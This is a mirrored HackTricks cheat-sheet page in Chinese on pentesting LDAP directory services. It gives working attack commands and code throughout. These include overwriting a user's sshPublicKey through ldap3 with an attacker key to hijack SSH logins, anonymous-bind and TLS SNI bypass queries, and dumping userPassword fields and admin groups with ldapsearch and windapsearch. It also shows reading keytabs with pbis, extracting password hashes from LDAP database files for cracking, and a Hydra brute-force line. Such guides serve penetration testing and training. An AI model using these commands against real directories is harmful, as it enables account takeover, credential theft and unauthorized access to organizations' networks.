mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
390 lines
17 KiB
Markdown
390 lines
17 KiB
Markdown
# 389, 636, 3268, 3269 - Pentesting LDAP
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一个**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|
||
|
||
## 基本信息
|
||
|
||
提取自:[https://searchmobilecomputing.techtarget.com/definition/LDAP](https://searchmobilecomputing.techtarget.com/definition/LDAP)
|
||
|
||
LDAP(轻量级目录访问协议)是一种软件协议,用于使任何人能够在网络上(无论是公共互联网还是企业内部网络)**定位**组织、个人和其他**资源**,如文件和设备。LDAP是目录访问协议(DAP)的“轻量级”(代码量较小)版本。
|
||
|
||
LDAP目录可以在多个服务器之间**分布**。每个服务器可以有一个**复制**的总目录版本,定期进行**同步**。LDAP服务器称为目录系统代理(DSA)。接收用户请求的LDAP服务器负责处理请求,并在必要时将其传递给其他DSA,但确保为用户提供单一协调的响应。
|
||
|
||
LDAP目录以简单的“树”层次结构组织,包括以下级别:
|
||
|
||
* 根目录(树的起始位置或源),分支到
|
||
* 国家,每个国家分支到
|
||
* 组织,分支到
|
||
* 组织单位(部门、部门等),分支到(包括一个条目)
|
||
* 个人(包括人员、文件和共享资源,如打印机)
|
||
|
||
**默认端口:**389和636(ldaps)。全局目录(ActiveDirectory中的LDAP)默认在端口3268上提供,LDAPS默认在端口3269上提供。
|
||
```
|
||
PORT STATE SERVICE REASON
|
||
389/tcp open ldap syn-ack
|
||
636/tcp open tcpwrapped
|
||
```
|
||
### LDAP数据交换格式
|
||
|
||
LDIF(LDAP数据交换格式)将目录内容定义为一组记录。它还可以表示更新请求(添加、修改、删除、重命名)。
|
||
```bash
|
||
dn: dc=local
|
||
dc: local
|
||
objectClass: dcObject
|
||
|
||
dn: dc=moneycorp,dc=local
|
||
dc: moneycorp
|
||
objectClass: dcObject
|
||
objectClass: organization
|
||
|
||
dn ou=it,dc=moneycorp,dc=local
|
||
objectClass: organizationalUnit
|
||
ou: dev
|
||
|
||
dn: ou=marketing,dc=moneycorp,dc=local
|
||
objectClass: organizationalUnit
|
||
Ou: sales
|
||
|
||
dn: cn= ,ou= ,dc=moneycorp,dc=local
|
||
objectClass: personalData
|
||
cn:
|
||
sn:
|
||
gn:
|
||
uid:
|
||
ou:
|
||
mail: pepe@hacktricks.xyz
|
||
phone: 23627387495
|
||
```
|
||
* 第1-3行定义了顶级域local。
|
||
* 第5-8行定义了一级域moneycorp(moneycorp.local)。
|
||
* 第10-16行定义了2个组织单位:dev和sales。
|
||
* 第18-26行创建了一个域对象,并分配了带有值的属性。
|
||
|
||
## 写入数据
|
||
|
||
请注意,如果您可以修改值,您可能能够执行非常有趣的操作。例如,想象一下,您**可以更改您的用户或任何用户的"sshPublicKey"信息**。很有可能,如果存在此属性,则**ssh正在从LDAP中读取公钥**。如果您可以修改用户的公钥,即使在ssh中未启用密码身份验证,您**仍然可以作为该用户登录**。
|
||
```bash
|
||
>>> import ldap3
|
||
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
|
||
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
|
||
>>> connection.bind()
|
||
True
|
||
>>> connection.extend.standard.who_am_i()
|
||
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
|
||
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
|
||
```
|
||
## 嗅探明文凭证
|
||
|
||
如果LDAP在没有SSL的情况下使用,你可以在网络中**嗅探到明文凭证**。
|
||
|
||
此外,你可以在LDAP服务器和客户端之间的网络中进行**中间人攻击(MITM)**。在这里,你可以进行**降级攻击**,使客户端使用**明文凭证**进行登录。
|
||
|
||
**如果使用SSL**,你可以尝试进行类似上述提到的MITM攻击,但提供一个**伪造的证书**,如果**用户接受**它,你就能够降级认证方法并再次查看凭证。
|
||
|
||
## 匿名访问
|
||
|
||
### 绕过TLS SNI检查
|
||
|
||
根据[**这篇文章**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/),只需使用任意域名(如company.com)访问LDAP服务器,他就能够以匿名用户的身份联系LDAP服务并提取信息。
|
||
```bash
|
||
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
||
```
|
||
### LDAP匿名绑定
|
||
|
||
[LDAP匿名绑定](https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)允许**未经身份验证的攻击者**从域中检索信息,例如完整的用户、组、计算机、用户帐户属性和域密码策略列表。这是一种**传统配置**,从Windows Server 2003开始,只有经过身份验证的用户才能发起LDAP请求。 \
|
||
然而,管理员可能需要**设置特定应用程序以允许匿名绑定**并提供了超出预期访问权限的访问,从而使未经身份验证的用户可以访问AD中的所有对象。
|
||
|
||
## 有效凭据
|
||
|
||
如果您有有效的凭据登录LDAP服务器,可以使用以下命令转储有关域管理员的所有信息:
|
||
|
||
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
|
||
```bash
|
||
pip3 install ldapdomaindump
|
||
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
|
||
```
|
||
### [暴力破解](../generic-methodologies-and-resources/brute-force.md#ldap)
|
||
|
||
## 枚举
|
||
|
||
### 自动化
|
||
|
||
使用此方法,您将能够查看**公开信息**(如域名)**:**
|
||
```bash
|
||
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
|
||
```
|
||
### Python
|
||
|
||
<details>
|
||
|
||
<summary>使用Python进行LDAP枚举</summary>
|
||
|
||
您可以尝试使用Python进行LDAP枚举,无论是否使用凭据:`pip3 install ldap3`
|
||
|
||
首先尝试**无凭据**连接:
|
||
```bash
|
||
>>> import ldap3
|
||
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
|
||
>>> connection = ldap3.Connection(server)
|
||
>>> connection.bind()
|
||
True
|
||
>>> server.info
|
||
```
|
||
如果响应是`True`,就像前面的例子一样,你可以从LDAP服务器获取一些**有趣的数据**(比如**命名上下文**或**域名**):
|
||
```bash
|
||
>>> server.info
|
||
DSA info (from DSE):
|
||
Supported LDAP versions: 3
|
||
Naming contexts:
|
||
dc=DOMAIN,dc=DOMAIN
|
||
```
|
||
一旦你获得了命名上下文,你可以进行一些更加有趣的查询。这个简单的查询应该会显示目录中的所有对象:
|
||
```bash
|
||
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
|
||
True
|
||
>> connection.entries
|
||
```
|
||
或者**转储**整个ldap:
|
||
```bash
|
||
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
|
||
True
|
||
>>> connection.entries
|
||
```
|
||
</details>
|
||
|
||
### windapsearch
|
||
|
||
[**Windapsearch**](https://github.com/ropnop/windapsearch) 是一个有用的Python脚本,通过利用LDAP查询来枚举Windows域中的用户、组和计算机。
|
||
```bash
|
||
# Get computers
|
||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
|
||
# Get groups
|
||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
|
||
# Get users
|
||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
|
||
# Get Domain Admins
|
||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
|
||
# Get Privileged Users
|
||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
|
||
```
|
||
### ldapsearch
|
||
|
||
检查空凭证或验证您的凭证是否有效:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
|
||
```bash
|
||
# CREDENTIALS NOT VALID RESPONSE
|
||
search: 2
|
||
result: 1 Operations error
|
||
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
|
||
tion a successful bind must be completed on the connection., data 0, v3839
|
||
```
|
||
如果你发现有关"_bind必须完成_"的内容,意味着凭证是不正确的。
|
||
|
||
你可以使用以下方法提取**域中的所有内容**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
-x Simple Authentication
|
||
-H LDAP Server
|
||
-D My User
|
||
-w My password
|
||
-b Base site, all data from here will be given
|
||
```
|
||
提取**用户**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
|
||
```
|
||
提取 **计算机**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
提取**我的信息**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
提取 **域管理员**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
提取**域用户**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
提取**企业管理员**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
提取 **Administrators**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
提取**远程桌面组**:
|
||
```bash
|
||
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
||
```
|
||
要查看是否有访问任何密码的权限,您可以在执行其中一个查询后使用grep命令:
|
||
```bash
|
||
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
|
||
```
|
||
请注意,您在这里找到的密码可能不是真实的...
|
||
|
||
#### pbis
|
||
|
||
您可以从这里下载**pbis**:[https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/),它通常安装在`/opt/pbis`目录下。\
|
||
**Pbis**允许您轻松获取基本信息:
|
||
```bash
|
||
#Read keytab file
|
||
./klist -k /etc/krb5.keytab
|
||
|
||
#Get known domains info
|
||
./get-status
|
||
./lsa get-status
|
||
|
||
#Get basic metrics
|
||
./get-metrics
|
||
./lsa get-metrics
|
||
|
||
#Get users
|
||
./enum-users
|
||
./lsa enum-users
|
||
|
||
#Get groups
|
||
./enum-groups
|
||
./lsa enum-groups
|
||
|
||
#Get all kind of objects
|
||
./enum-objects
|
||
./lsa enum-objects
|
||
|
||
#Get groups of a user
|
||
./list-groups-for-user <username>
|
||
./lsa list-groups-for-user <username>
|
||
#Get groups of each user
|
||
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
|
||
|
||
#Get users of a group
|
||
./enum-members --by-name "domain admins"
|
||
./lsa enum-members --by-name "domain admins"
|
||
#Get users of each group
|
||
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
|
||
|
||
#Get description of each user
|
||
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
|
||
echo "$line";
|
||
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
|
||
echo "======================"
|
||
done
|
||
```
|
||
## 图形界面
|
||
|
||
### Apache Directory
|
||
|
||
[**从这里下载Apache Directory**](https://directory.apache.org/studio/download/download-linux.html)。你可以在[这里找到如何使用这个工具的示例](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s)。
|
||
|
||
### jxplorer
|
||
|
||
你可以在这里下载带有LDAP服务器的图形界面:[http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
|
||
|
||
默认情况下,它安装在:_/opt/jxplorer_
|
||
|
||
![](<../.gitbook/assets/image (22) (1).png>)
|
||
|
||
## 通过Kerberos进行身份验证
|
||
|
||
使用`ldapsearch`命令,你可以通过使用参数`-Y GSSAPI`来**使用Kerberos进行身份验证**,而不是通过**NTLM**进行身份验证。
|
||
|
||
## POST
|
||
|
||
如果你可以访问包含数据库的文件(可能在_/var/lib/ldap_中),你可以使用以下命令提取哈希值:
|
||
```bash
|
||
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
|
||
```
|
||
你可以将密码哈希值输入给John(从'{SSHA}'到'structural',不包括'structural')。
|
||
|
||
### 配置文件
|
||
|
||
* 通用
|
||
* containers.ldif
|
||
* ldap.cfg
|
||
* ldap.conf
|
||
* ldap.xml
|
||
* ldap-config.xml
|
||
* ldap-realm.xml
|
||
* slapd.conf
|
||
* IBM SecureWay V3 服务器
|
||
* V3.sas.oc
|
||
* Microsoft Active Directory 服务器
|
||
* msadClassesAttrs.ldif
|
||
* Netscape Directory Server 4
|
||
* nsslapd.sas\_at.conf
|
||
* nsslapd.sas\_oc.conf
|
||
* OpenLDAP 目录服务器
|
||
* slapd.sas\_at.conf
|
||
* slapd.sas\_oc.conf
|
||
* Sun ONE Directory Server 5.1
|
||
* 75sas.ldif
|
||
|
||
## HackTricks 自动命令
|
||
```
|
||
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
|
||
Port_Number: 389,636 #Comma separated if there is more than one.
|
||
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
|
||
|
||
Entry_1:
|
||
Name: Notes
|
||
Description: Notes for LDAP
|
||
Note: |
|
||
LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP).
|
||
|
||
https://book.hacktricks.xyz/pentesting/pentesting-ldap
|
||
|
||
Entry_2:
|
||
Name: Banner Grab
|
||
Description: Grab LDAP Banner
|
||
Command: nmap -p 389 --script ldap-search -Pn {IP}
|
||
|
||
Entry_3:
|
||
Name: LdapSearch
|
||
Description: Base LdapSearch
|
||
Command: ldapsearch -H ldap://{IP} -x
|
||
|
||
Entry_4:
|
||
Name: LdapSearch Naming Context Dump
|
||
Description: Attempt to get LDAP Naming Context
|
||
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
|
||
|
||
Entry_5:
|
||
Name: LdapSearch Big Dump
|
||
Description: Need Naming Context to do big dump
|
||
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
|
||
|
||
Entry_6:
|
||
Name: Hydra Brute Force
|
||
Description: Need User
|
||
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一家 **网络安全公司** 工作吗?你想在 HackTricks 中看到你的 **公司广告**吗?或者你想获得 **PEASS 的最新版本或下载 HackTricks 的 PDF** 吗?请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获得 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我的 **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **通过向 [hacktricks 仓库](https://github.com/carlospolop/hacktricks) 和 [hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud) 提交 PR 来分享你的黑客技巧**。
|
||
|
||
</details>
|